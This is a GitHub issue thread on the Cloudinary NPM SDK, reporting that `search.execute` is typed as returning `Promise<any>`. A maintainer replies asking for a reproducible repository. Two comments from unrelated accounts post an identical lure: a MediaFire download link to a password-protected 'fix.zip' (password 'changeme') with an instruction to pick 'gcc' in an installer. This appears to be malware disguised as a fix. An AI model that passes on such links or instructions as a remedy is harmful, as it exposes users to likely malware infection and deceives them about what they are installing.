### ISSUE TITLE
search.execute returns Promise<any>

### ISSUE THREAD

**Issue by kostas-pblworks** [cloudinary/cloudinary_npm#683]
## Bug report for Cloudinary NPM SDK
Before proceeding, please update to latest version and test if the issue persists

## Describe the bug in a sentence or two.

The `search.execute` function should return the correct type, not just `any`.

## Issue Type (Can be multiple)
[ ] Build - Can’t install or import the SDK
[ ] Babel - Babel errors or cross browser issues
[ ] Performance - Performance issues
[ ] Behaviour - Functions aren’t working as expected (Such as generate URL)
[ ] Documentation - Inconsistency between the docs and behaviour
[x] Incorrect Types - For typescript users who are having problems with our d.ts files
[ ] Other (Specify)

## Steps to reproduce
… if applicable

## Error screenshots

![image](https://github.com/user-attachments/assets/af7cfcdb-a9df-4689-9016-6d4f41b7da47)

Our linting complains on any return values.

## Browsers (if issue relates to UI, else ignore)
[ ] Chrome
[ ] Firefox
[ ] Safari
[ ] Other (Specify)
[ ] All

## Versions and Libraries (fill in the version numbers)
Cloudinary_NPM SDK 2.4.0
Node - 18.9.0
NPM - 10.2.3

## Config Files (Please paste the following files if possible)
Package.json

## Repository
If possible, please provide a link to a reproducible repository that showcases the problem

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dannyv-cloudinary** [comment]
Hi @kostas-pblworks.
In order to speed up diagnosis, could you please create a simple repo which shows this issue so that we can debug this further?
